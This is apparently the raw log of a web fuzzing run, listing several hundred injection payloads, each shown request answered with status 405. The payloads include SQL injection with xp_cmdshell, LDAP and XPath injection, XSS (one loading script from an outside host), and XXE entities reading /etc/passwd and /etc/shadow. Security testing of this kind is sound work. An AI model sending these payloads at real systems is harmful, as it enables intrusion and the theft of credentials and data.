00398:  C=405      0 L	       3 W	    111 Ch	  "like"
00396:  C=405      0 L	       3 W	    111 Ch	  "truncate"
00395:  C=405      0 L	       3 W	    111 Ch	  "having"
00394:  C=405      0 L	       3 W	    111 Ch	  "distinct"
00393:  C=405      0 L	       3 W	    111 Ch	  "update"
00392:  C=405      0 L	       3 W	    111 Ch	  "delete"
00391:  C=405      0 L	       3 W	    111 Ch	  "desc"
00390:  C=405      0 L	       3 W	    111 Ch	  "asc"
00389:  C=405      0 L	       3 W	    111 Ch	  "order by"
00387:  C=405      0 L	       3 W	    111 Ch	  "procedure"
00388:  C=405      0 L	       3 W	    111 Ch	  "limit"
00386:  C=405      0 L	       3 W	    111 Ch	  "or"
00384:  C=405      0 L	       3 W	    111 Ch	  "insert"
00383:  C=405      0 L	       3 W	    111 Ch	  "select"
00382:  C=405      0 L	       3 W	    111 Ch	  "PRINT @@variable"
00381:  C=405      0 L	       3 W	    111 Ch	  "PRINT"
00380:  C=405      0 L	       3 W	    111 Ch	  ",@variable"
00379:  C=405      0 L	       3 W	    111 Ch	  "@variable"
00378:  C=405      0 L	       3 W	    111 Ch	  "'hi' or 'x'='x';"
00377:  C=405      0 L	       3 W	    111 Ch	  "hi") or ("a"="a"
00376:  C=405      0 L	       3 W	    111 Ch	  "hi') or ('a'='a"
00375:  C=405      0 L	       3 W	    111 Ch	  "hi' or 'a'='a"
00373:  C=405      0 L	       3 W	    111 Ch	  "hi" or 1=1 --"
00374:  C=405      0 L	       3 W	    111 Ch	  "hi' or 1=1 --"
00372:  C=405      0 L	       3 W	    111 Ch	  "hi" or "a"="a"
00371:  C=405      0 L	       3 W	    111 Ch	  "") or ("a"="a"
00368:  C=405      0 L	       3 W	    111 Ch	  "' or a=a--"
00370:  C=405      0 L	       3 W	    111 Ch	  "') or ('a'='a"
00367:  C=405      0 L	       3 W	    111 Ch	  "" or 1=1 or ""=""
00366:  C=405      0 L	       3 W	    111 Ch	  "' or 1=1 or ''='"
00365:  C=405      0 L	       3 W	    111 Ch	  "or%201=1 --"
00364:  C=405      0 L	       3 W	    111 Ch	  "or%201=1"
00360:  C=405      0 L	       3 W	    111 Ch	  "" or 1=1--"
00363:  C=405      0 L	       3 W	    111 Ch	  "or 1=1--"
00359:  C=405      0 L	       3 W	    111 Ch	  "' or 1=1--"
00362:  C=405      0 L	       3 W	    111 Ch	  ""' or 1 --'""
00358:  C=405      0 L	       3 W	    111 Ch	  "or 0=0 #"
00356:  C=405      0 L	       3 W	    111 Ch	  "' or 0=0 #"
00403:  C=405      0 L	       3 W	    111 Ch	  "' or userid like '%"
00409:  C=405      0 L	       3 W	    111 Ch	  "'; exec xp_regread"
00405:  C=405      0 L	       3 W	    111 Ch	  "' or user like '%"
00417:  C=405      0 L	       3 W	    111 Ch	  "'||UTL_HTTP.REQUEST"
00443:  C=405      0 L	       3 W	    111 Ch	  "%26"
00444:  C=405      0 L	       3 W	    111 Ch	  "!"
00433:  C=405      0 L	       3 W	    111 Ch	  "%2A%7C"
00442:  C=405      0 L	       3 W	    111 Ch	  "&"
00440:  C=405      0 L	       3 W	    111 Ch	  ")"
00435:  C=405      0 L	       3 W	    111 Ch	  "%2A%28%7C%28mail%3D%2A%29%29"
00436:  C=405      0 L	       3 W	    111 Ch	  "*(|(objectclass=*))"
00438:  C=405      0 L	       3 W	    111 Ch	  "("
00437:  C=405      0 L	       3 W	    111 Ch	  "%2A%28%7C%28objectclass%3D%2A%29%29"
00434:  C=405      0 L	       3 W	    111 Ch	  "*(|(mail=*))"
00439:  C=405      0 L	       3 W	    111 Ch	  "%28"
00432:  C=405      0 L	       3 W	    111 Ch	  "*|"
00431:  C=405      0 L	       3 W	    111 Ch	  "%7C"
00441:  C=405      0 L	       3 W	    111 Ch	  "%29"
00429:  C=405      0 L	       3 W	    111 Ch	  "(sqlattempt2)"
00430:  C=405      0 L	       3 W	    111 Ch	  "|"
00427:  C=405      0 L	       3 W	    111 Ch	  "&apos;%20OR"
00428:  C=405      0 L	       3 W	    111 Ch	  "'sqlattempt1"
00425:  C=405      0 L	       3 W	    111 Ch	  "%20'sleep%2050'"
00426:  C=405      0 L	       3 W	    111 Ch	  "char%4039%41%2b%40SELECT"
00421:  C=405      0 L	       3 W	    111 Ch	  "&lt;&gt;&quot;'%;)(&amp;+"
00424:  C=405      0 L	       3 W	    111 Ch	  "%20$(sleep%2050)"
00422:  C=405      0 L	       3 W	    111 Ch	  "'%20or%201=1"
00423:  C=405      0 L	       3 W	    111 Ch	  "%27%20or%201=1"
00419:  C=405      0 L	       3 W	    111 Ch	  "to_timestamp_tz"
00420:  C=405      0 L	       3 W	    111 Ch	  "tz_offset"
00418:  C=405      0 L	       3 W	    111 Ch	  "1;SELECT%20*"
00416:  C=405      0 L	       3 W	    111 Ch	  "' (select top 1"
00412:  C=405      0 L	       3 W	    111 Ch	  "\x27UNION SELECT"
00415:  C=405      0 L	       3 W	    111 Ch	  "' or (EXISTS)"
00414:  C=405      0 L	       3 W	    111 Ch	  "' UNION ALL SELECT"
00411:  C=405      0 L	       3 W	    111 Ch	  "--sp_password"
00408:  C=405      0 L	       3 W	    111 Ch	  "'; exec master..xp_cmdshell"
00410:  C=405      0 L	       3 W	    111 Ch	  "t'exec master..xp_cmdshell 'nslookup www.google.com'--"
00413:  C=405      0 L	       3 W	    111 Ch	  "' UNION SELECT"
00407:  C=405      0 L	       3 W	    111 Ch	  "exec sp"
00404:  C=405      0 L	       3 W	    111 Ch	  "' or uid like '%"
00406:  C=405      0 L	       3 W	    111 Ch	  "exec xp"
00445:  C=405      0 L	       3 W	    111 Ch	  "%21"
00447:  C=405      0 L	       3 W	    111 Ch	  "' or ''='"
00451:  C=405      0 L	       3 W	    111 Ch	  "//*"
00459:  C=405      0 L	       3 W	    111 Ch	  "<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>"
00468:  C=405      0 L	       3 W	    111 Ch	  "<HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML>"
00458:  C=405      0 L	       3 W	    111 Ch	  "<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>"
00467:  C=405      0 L	       3 W	    111 Ch	  "<xml SRC="xsstest.xml" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
00466:  C=405      0 L	       3 W	    111 Ch	  "<xml ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:alert('XSS')"&gt;</B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
00465:  C=405      0 L	       3 W	    111 Ch	  "<xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>"
00464:  C=405      0 L	       3 W	    111 Ch	  "<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]><foo>&xxe;</foo>"
00462:  C=405      0 L	       3 W	    111 Ch	  "<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/passwd">]><foo>&xxe;</foo>"
00460:  C=405      0 L	       3 W	    111 Ch	  "<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foo>"
00450:  C=405      0 L	       3 W	    111 Ch	  "//"
00463:  C=405      0 L	       3 W	    111 Ch	  "<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/shadow">]><foo>&xxe;</foo>"
00461:  C=405      0 L	       3 W	    111 Ch	  "<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xxe;</foo>"
00456:  C=405      0 L	       3 W	    111 Ch	  "<name>','')); phpinfo(); exit;/*</name>"
00452:  C=405      0 L	       3 W	    111 Ch	  "*/*"
00454:  C=405      0 L	       3 W	    111 Ch	  "count(/child::node())"
00453:  C=405      0 L	       3 W	    111 Ch	  "@*"
00457:  C=405      0 L	       3 W	    111 Ch	  "<![CDATA[<script>var n=0;while(true){n++;}</script>]]>"
00455:  C=405      0 L	       3 W	    111 Ch	  "x' or name()='username' or 'x'='y"
00448:  C=405      0 L	       3 W	    111 Ch	  "x' or 1=1 or 'x'='y"
00449:  C=405      0 L	       3 W	    111 Ch	  "/"
00446:  C=405      0 L	       3 W	    111 Ch	  "' or 1=1 or ''='"

Total time: 0
Processed Requests: 468
Filtered Requests: 0
Requests/sec.: 0
